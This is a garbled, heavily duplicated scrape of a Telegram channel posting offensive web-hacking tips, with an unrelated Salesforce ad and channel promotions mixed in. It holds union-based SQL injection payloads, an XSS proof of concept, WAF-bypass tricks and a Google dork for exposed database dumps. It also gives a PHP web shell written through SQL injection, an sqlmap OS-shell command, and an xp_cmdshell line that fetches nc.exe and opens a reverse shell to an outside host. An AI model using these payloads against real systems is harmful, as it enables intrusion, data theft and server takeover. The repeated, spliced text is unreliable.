๐ญ Union based:
Look, when you make a request to a URL, there are three modes: (if it interacts with SQL)
1- To return an answer to you
(For example, when buying from a bookstore, it will tell you how many of these books are available)
2- To return a result of the answer to you
(For example, in the same example above, instead of telling you the number, just tell you whether this book is available or not)
3- That no result comes back to you.
(For example, you sent a GET or POST request and now the website asks you to allow it to save ip, cookie, user agent, .. otherwise you will not be allowed to work with the site.
How do we know if we have a union?
If the URL is:
The following query is sent to the
database:
Now, to determine if there is Union ๐ญ Union based:
Look, when you make a request to a URL, there are three modes: (if it interacts with SQL)
1_ To return an answer to you
(For example, when buying from a bookstore, it will tell you how many of these books are available)
2_ To return a result of the answer to you
(For example, in the same example above, instead of telling you the number, just tell you whether this book is available or not)
3- That no result comes back to you.
(For example, you sent a GET or POST request and now the website asks you to allow it to save ip, cookie, user agent, .. otherwise you will not be allowed to work with the site.
How do we know if we have a union?
If the URL is:
The following query is sent to the database:
Now, to determine if there is Union or not, we have:
With order by, you can extract the number of columns in a database.
Default request:
Test 1:
Test 2:
Above if:
Default == Test 1
And also
Test 1 != Test 2
We understand that we have Union (:
Now how to extract the information?
The first step is to get the number of columns
And we can find as follows:
default request
default request
default request
not same as Default
So we understand that we have 3 columns
Now with:
We can find the column that returns to us and run our own payloads in it to get data:
For example, to get the database name:
(if it returns the third column)
To get the tables of a database:
To get the columns of a database and a table:
And to get data, we have a column:
#SQLIor not, we have:
With order by, you can extract the number of columns in a database.
Default request:
Test 1:
Test 2:
Above if
Default == Test 1
And also
Test 1 != Test 2
We understand that we have Union (:
Now how to extract the information?
The first step is to get the number of columns
And we can find as follows:
same as default request
same as default request
same as default request
not same as Default
So we understand that we have 3 columns
Now with:
#sqli
๐๐ป
Look, when you make a request to a URL, there are three modes: (if it interacts with SQL)
1- To return an answer to you
(For example, when buying from a bookstore, it will tell you how many of these books are available)
2- To return a result of the answer to you
(For example, in the same example above, instead of telling you the number, just tell you whether this book is available or not)
3- That no result comes back to you.
(For example, you sent a GET or POST request and now the website asks you to allow it to save ip, cookie, user agent, .. otherwise you will not be allowed to work with the site.
How do we know if we have a union?
If the URL is:
https://site.com?news=22
The following query is sent to the
database:
select * from news where news_id = $newsid;
select * from news where news_id = '$newsid';
select * from news where news_id = "$newsid";
Now, to determine if there is Union ๐ญ Union based:
Look, when you make a request to a URL, there are three modes: (if it interacts with SQL)
1_ To return an answer to you
(For example, when buying from a bookstore, it will tell you how many of these books are available)
2_ To return a result of the answer to you
(For example, in the same example above, instead of telling you the number, just tell you whether this book is available or not)
3- That no result comes back to you.
(For example, you sent a GET or POST request and now the website asks you to allow it to save ip, cookie, user agent, .. otherwise you will not be allowed to work with the site.
How do we know if we have a union?
If the URL is:
https://site.com?news=22
The following query is sent to the database:
select * from news where news_id = $newsid;
select * from news where news_id = '$newsid';
select * from news where news_id = "$newsid";
Now, to determine if there is Union or not, we have:
With order by, you can extract the number of columns in a database.
Default request:
page/?id=54
Test 1:
page/?id=54 order by 1
page/?id=54' order by 1 #
page/?id=54" order by 1 #
Test 2:
page/?id=54 order by 1000
page/?id=54' order by 1000#
page/?id=54" order by 1000#
Above if:
Default == Test 1
And also
Test 1 != Test 2
We understand that we have Union (:
Now how to extract the information?
The first step is to get the number of columns
And we can find as follows:
page/?id=54 order by 1 # same as
default request
page/?id=54 order by 2 # same as
default request
page/?id=54 order by 3 # same as
default request
page/?id=54 order by 4 #
not same as Default
So we understand that we have 3 columns
Now with:
page/?id=54 union select 1,2,3 #
We can find the column that returns to us and run our own payloads in it to get data:
For example, to get the database name:
(if it returns the third column)
page/?id=54 union select 1,2,database()#
To get the tables of a database:
page/?id=54 UNION SELECT table_name FROM information_schema.tables WHERE table_schema = 'your_database_name' --
To get the columns of a database and a table:
UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'your_table_name' AND table_schema = 'your_database_name' --
And to get data, we have a column:
UNION SELECT your_column_name FROM your_table_name LIMIT 1 OFFSET 0 --
#SQLIor not, we have:
With order by, you can extract the number of columns in a database.
Default request:
page/?id=54
Test 1:
page/?id=54 order by 1
page/?id=54' order by 1 #
page/?id=54" order by 1 #
Test 2:
page/?id=54 order by 1000
page/?id=54' order by 1000#
page/?id=54" order by 1000#
Above if
Default == Test 1
And also
Test 1 != Test 2
We understand that we have Union (:
Now how to extract the information?
The first step is to get the number of columns
And we can find as follows:
page/?id=54 order by 1 #
same as default request
page/?id=54 order by 2 #
same as default request
page/?id=54 order by 3 #
same as default request
page/?id=54 order by 4 #
not same as Default
So we understand that we have 3 columns
Now with:
page/?id=54 union select 1,2,3 #
#sqli
๐๐ป
Salesforce
Salesforce UK: The #1 AI CRM
Salesforce is the #1 AI CRM, helping companies become Agentic Enterprises where humans and agents drive success together through a unified AI, data, and Customer 360 platform.
๐2โค1
We can find the column that returns to us and run our own payloads in it to get data:
For example, to get the database name:
(if it returns the third column)
To get the tables of a database:
To get the columns of a database and a table:
And to get data, we have a column:
#SQLI
For example, to get the database name:
(if it returns the third column)
page/?id=54 union select 1,2,database()#
To get the tables of a database:
page/?id=54 UNION SELECT table_name FROM information_schema.tables WHERE table_schema = 'your_database_name' --
To get the columns of a database and a table:
UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'your_table_name' AND table_schema = 'your_database_name' --
And to get data, we have a column:
UNION SELECT your_column_name FROM your_table_name LIMIT 1 OFFSET 0 --
#SQLI
๐2
SQL injection.pdf
599.4 KB
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the
client to the application.
client to the application.
โค5๐1
My first vulnerability in NASA: A Local File Inclusion (LFI) vulnerability has been discovered. A Local File Inclusion (LFI/Directory Traversal) vulnerability has been identified on NASA.GOV. This vulnerability allows attackers to exploit insecure file path injection to access sensitive files. On the NASA system
https://x.com/Mr_Dark55/status/1866978916302278931?t=-QcBL7_6M9Ui7gnLtPlB1A&s=19
https://x.com/Mr_Dark55/status/1866978916302278931?t=-QcBL7_6M9Ui7gnLtPlB1A&s=19
๐ฅ11๐1๐1
CVE-2024-10793
WP Activity Log Plugin for WordPress
Stored XSS via user_id parameter in all versions prior to 5.2.1
WP Activity Log Plugin for WordPress
Stored XSS via user_id parameter in all versions prior to 5.2.1
curl -X POST 'http://example.com/wp-admin/admin-ajax.php' \-d 'action=destroy-sessions&user_id=<script>alert("XSS")</script>'
โค5
๐ป Disclosed vulnerabilities with bug bounty
1๏ธโฃ Account takeover via Self-XSS
An example of how additional functionality can be used to squeeze account takeover in one click from the useless Self XSS. See the report for more details.
2๏ธโฃ SQL injection in POST request
Identification and exploitation of Union-based SQL injection in POST request based on server responses. More information about exploitation of such vulnerabilities here.
3๏ธโฃ OTP Bypass
Bypassing OTP confirmation by manipulating the server response. I told you about such bugs here.
#web #xss #sqli
1๏ธโฃ Account takeover via Self-XSS
An example of how additional functionality can be used to squeeze account takeover in one click from the useless Self XSS. See the report for more details.
2๏ธโฃ SQL injection in POST request
Identification and exploitation of Union-based SQL injection in POST request based on server responses. More information about exploitation of such vulnerabilities here.
3๏ธโฃ OTP Bypass
Bypassing OTP confirmation by manipulating the server response. I told you about such bugs here.
#web #xss #sqli
โค7๐3๐2
ุงุฏุฎููุง ุงูููุงุฉ ุฏู ุจุชูุดุฑ ู
ุญุชูู ุฑุงูู
https://t.me/wa3i_tech
https://t.me/wa3i_tech
https://t.me/wa3i_tech
https://t.me/wa3i_tech
https://t.me/wa3i_tech
https://t.me/wa3i_tech
Telegram
Wa3i | ูุนู
ู
ุฑุญุจุงู ุจู ูู ุฌุญูู
ุงููุนู
ุชูุฏุฑ ุชุดูู ุจุงูู ูููุงุชู ููุง @iiMrDarkChannels
ุชูุฏุฑ ุชุดูู ุจุงูู ูููุงุชู ููุง @iiMrDarkChannels
ExploitQuest
Photo
โโ๐ About bypassing protection against SQL injections
Often, the WAF on the site stifles all attempts to perform SQL injection and does not allow it's okay to insert a quotation mark and insert the usual payload, however, with some clever manipulations it is still often possible to bypass it.
For example, by adding control characters like %00 , %0A , etc. or by inserting mathematical operations
or by adding specific comments like
https://websec.ca/kb/sql_injection
https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet/
#web #sqli #bypass #waf
Often, the WAF on the site stifles all attempts to perform SQL injection and does not allow it's okay to insert a quotation mark and insert the usual payload, however, with some clever manipulations it is still often possible to bypass it.
For example, by adding control characters like %00 , %0A , etc. or by inserting mathematical operations
( 'AND'1'=1*1 instead of 'AND'1'='1' )
or by adding specific comments like
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
and much more.
For more examples, you can check out this repository, which shows bypass options for different situations, and I highly recommend this site.
https://websec.ca/kb/sql_injection
https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet/
#web #sqli #bypass #waf
โค6๐ฅ3
๐ Forgotten database dumps
Old database dumps can contain all sorts of interesting information - user credentials, configuration settings, API secrets and keys, customer data, and more.
Here is a short but effective checklist to quickly check for forgotten database dumps.
Old database dumps can contain all sorts of interesting information - user credentials, configuration settings, API secrets and keys, customer data, and more.
Here is a short but effective checklist to quickly check for forgotten database dumps.
/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
/setup.sql
/sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql
๐4โค1
dork:
intitle:"index of" "back.sql" OR "backup.sql" OR "accounts.sql" OR "backups.sql" OR "clients.sql" OR "customers.sql" OR "data.sql" OR "database.sql" OR "database.sqlite" OR "users.sql" OR "db.sql" OR "db.sqlite" OR "db_backup.sql" OR "dbase.sql" OR "dbdump.sql" OR "setup.sql" OR "sqldump.sql" OR "dump.sql" OR "mysql.sql" OR "sql.sql" OR "temp.sql"
๐4โค1
๐ Transition from SQL injection to shell or backdoor
โซ๏ธUse the โinto outfileโ command to write to a file:
โซ๏ธCapture the request in Burp Proxy and save it to the post-request file, then run sqlmap :
โซ๏ธreverse netcat shell via mssql injection when xp_cmdshell is available:
#web #sqli
โซ๏ธUse the โinto outfileโ command to write to a file:
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #
โซ๏ธCapture the request in Burp Proxy and save it to the post-request file, then run sqlmap :
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10
โซ๏ธreverse netcat shell via mssql injection when xp_cmdshell is available:
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--
#web #sqli
๐ฅ4โค1
๐จ Getting other vulnerabilities when downloading a file
When testing file upload functionality in a web application, try setting the file name to the following values:
These payloads may introduce additional vulnerabilities.
#web
When testing file upload functionality in a web application, try setting the file name to the following values:
โซ๏ธ ../../../tmp/lol.png -> for Path Traversal vulnerability
โซ๏ธ sleep(10)-- -.jpg -> for SQL injection
โซ๏ธ <svg onload=alert(document.domain)>.jpg/png -> for XSS
โซ๏ธ ; sleep 10; -> for command injection
These payloads may introduce additional vulnerabilities.
#web
๐3๐3โค1